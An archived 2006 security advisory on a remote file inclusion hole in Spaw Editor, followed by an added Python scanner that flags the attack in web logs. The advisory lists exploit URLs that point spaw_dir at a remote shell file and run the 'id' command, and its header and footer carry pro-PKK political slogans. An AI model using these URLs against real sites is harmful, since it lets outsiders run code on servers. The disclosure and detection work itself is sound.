[Kurdish Security # 23] Spaw Editor Remote Include Vulnerability

2006-08-21T00:00:00
ID SECURITYVULNS:DOC:13973
Type securityvulns
Reporter Securityvulns
Modified 2006-08-21T00:00:00

Description

  • Kurdish Security Advisory
  • Spaw Editor Remote Include Vulnerability
  • Our Party is PKK, Our Army HPG, We will Earn
  • contact ? : irc.gigachat.net #kurdhack & botan@linuxmail.org
  • Risk : High
  • Class : Remote
  • Script : Spaw Editor
  • Version : v1.6 and v1.7
  • Site : www.solmetra.com

<?
// include wysiwyg config
include '../config/spaw_control.config.php';
include $spaw_root.'class/lang.class.php';

$theme = empty($HTTP_GET_VARS['theme'])?$spaw_default_theme:$HTTP_GET_VARS['theme'];
$theme_path = $spaw_dir.'lib/themes/'.$theme.'/';

$l = new SPAW_Lang($HTTP_GET_VARS['lang']);
$l->setBlock('colorpicker');
?>

http://site.com/[path]/dialogs/a.php?spaw_dir=http://www.shell.txt?&cmd=id
http://site.com/[path]/dialogs/collorpicker.phpspaw_dir=http://www.shell.txt&cmd=id
http://site.com/[path]/dialogs/img.php?spaw_dir=http://www.shell.txt?&cmd=id
http://site.com/[path]/dialogs/img_library.php?spaw_dir=http://www.shell.txt?&cmd=id
http://site.com/[path]/dialogs/table.php?spaw_dir=http://www.shell.txt?&cmd=id
http://site.com/[path]/dialogs/td.php?spaw_dir=http://www.shell.txt?&cmd=id
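
Added example (not part of the original advisory): a check over web access logs for the request pattern listed above. It flags requests to dialogs/*.php that pass a URL-like value in spaw_dir or spaw_root, the two variables the snippet concatenates into file paths. The log format, paths, hosts and addresses in SAMPLE_LOG are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request line inside a common/combined-format access-log entry (assumed format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Value that begins with a URL scheme (http:, ftp:, php:, data:, ...), //host or a UNC path.
REMOTE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.-]*:|//|\\\\)', re.I)
# Variables the advisory's snippet concatenates into file paths.
PATH_VARS = {"spaw_dir", "spaw_root"}
DIALOG_RE = re.compile(r'/dialogs/[^/]+\.php$', re.I)

# Constructed sample log lines (documentation addresses, placeholder host).
SAMPLE_LOG = [
    '192.0.2.10 - - [21/Aug/2006:10:00:01 +0000] "GET /spaw/dialogs/colorpicker.php?theme=default&lang=en HTTP/1.1" 200 2311',
    '198.51.100.7 - - [21/Aug/2006:10:02:13 +0000] "GET /spaw/dialogs/img.php?spaw_dir=http://example.invalid/x.txt?&cmd=id HTTP/1.1" 200 512',
    '198.51.100.7 - - [21/Aug/2006:10:02:15 +0000] "GET /spaw/dialogs/table.php?spaw_dir=http%3A%2F%2Fexample.invalid%2Fx.txt%3F HTTP/1.0" 200 498',
    '192.0.2.10 - - [21/Aug/2006:10:05:40 +0000] "GET /spaw/dialogs/td.php?lang=en HTTP/1.1" 200 1999',
]


def suspicious_requests(log_lines):
    """Return (line_no, path, param, value) for each request to dialogs/*.php
    that supplies a URL-like value in one of PATH_VARS."""
    hits = []
    for line_no, line in enumerate(log_lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue  # not a parseable request line
        target = urlsplit(match.group(1))
        if not DIALOG_RE.search(target.path):
            continue
        # parse_qsl percent-decodes, so encoded schemes (http%3A%2F%2F) are caught too.
        for name, value in parse_qsl(target.query, keep_blank_values=True):
            if name.lower() in PATH_VARS and REMOTE_RE.match(value):
                hits.append((line_no, target.path, name, value))
    return hits


if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print("line %d: %s %s=%r" % hit)
```

A legitimate client has no reason to send either variable, so any hit is worth reviewing, including the response status and size logged for that request.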

Special MSG! : The Turk state is the aggressor behavior Don't stay quiet. Hear the Kurdish people is scream be late.. Stop the Turkey Military!